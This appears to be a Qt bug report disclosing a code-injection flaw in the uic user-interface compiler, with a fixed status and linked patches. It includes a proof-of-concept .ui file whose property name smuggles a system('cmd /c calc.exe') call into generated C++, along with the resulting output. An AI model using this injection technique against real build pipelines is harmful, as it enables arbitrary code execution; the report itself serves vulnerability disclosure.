Details
-
Bug
-
Resolution: Fixed
-
P1: Critical
-
5.11.1
-
All
-
53c8d1fe7 (dev), 690c2f2d6 (6.8), d9f5b6170 (6.7), aae20da52 (dev), 0925c2d80 (6.8), 24dfadbf7 (6.7)
Description
Due to improper parsing in the .ui file, a user can inject a malicious code into the XML design files and the generated code by uic will include the malicious code. Without proper inspection of the generated code, or a case where an automated system is being use to generate the code and automatically compiles the code, can lead to an arbitrary code execution.
Given this .ui, let's generate the C++ code using uic:
<?xml version="1.0" encoding="UTF-8"?> <ui version="4.0"> <class>MainWindow</class> <widget class="QMainWindow" name="MainWindow"> <property name="geometry"> <rect> <x>0</x> <y>0</y> <width>1000</width> <height>500</height> </rect> </property> <property name="windowTitle"> <string>MainWindow</string> </property> <widget class="QWidget" name="centralwidget"> <widget class="QLabel" name="label"> <property name="geometry"> <rect> <x>10</x> <y>0</y> <width>1000</width> <height>50</height> </rect> </property> <property name="text("Hello world!"); system("cmd /c calc.exe");//"> <string>TextLabel</string> </property> </widget> </widget> </widget> <resources/> <connections/> </ui>
The following is the result of the converted code:
/******************************************************************************** ** Form generated from reading UI file 'untitled.ui' ** ** Created by: Qt User Interface Compiler version 5.11.1 ** ** WARNING! All changes made in this file will be lost when recompiling UI file! ********************************************************************************/ #ifndef UNTITLED_H #define UNTITLED_H #include <QtCore/QVariant> #include <QtWidgets/QApplication> #include <QtWidgets/QLabel> #include <QtWidgets/QMainWindow> #include <QtWidgets/QWidget> QT_BEGIN_NAMESPACE class Ui_MainWindow { public: QWidget *centralwidget; QLabel *label; void setupUi(QMainWindow *MainWindow) { if (MainWindow->objectName().isEmpty()) MainWindow->setObjectName(QStringLiteral("MainWindow")); MainWindow->resize(1000, 500); centralwidget = new QWidget(MainWindow); centralwidget->setObjectName(QStringLiteral("centralwidget")); label = new QLabel(centralwidget); label->setObjectName(QStringLiteral("label")); label->setGeometry(QRect(10, 0, 1000, 50)); MainWindow->setCentralWidget(centralwidget); retranslateUi(MainWindow); QMetaObject::connectSlotsByName(MainWindow); } // setupUi void retranslateUi(QMainWindow *MainWindow) { MainWindow->setWindowTitle(QApplication::translate("MainWindow", "MainWindow", nullptr)); label->setText("Hello world!"); system("cmd /c calc.exe");//(QApplication::translate("MainWindow", "TextLabel", nullptr)); } // retranslateUi }; namespace Ui { class MainWindow: public Ui_MainWindow {}; } // namespace UiQT_END_NAMESPACE #endif // UNTITLED_H
This behavior also works on the Python version of the compiler (pyuic).
Please let me know if this is considered as a security issue, because it is ambigous given that the uic or pyuic might be used in an automated environment that compiles the generated code.
Attachments
| For Gerrit Dashboard: QTBUG-126265 | ||||||
|---|---|---|---|---|---|---|
| # | Subject | Branch | Project | Status | CR | V |
| 568634,2 | uic: Prevent code injection via invalid property names/values | tqtc/lts-6.5 | qt/tqtc-qtbase | Status: NEW | +2 | 0 |
| 575584,2 | uic: Relax property name checks | tqtc/lts-6.5 | qt/tqtc-qtbase | Status: NEW | +2 | +1 |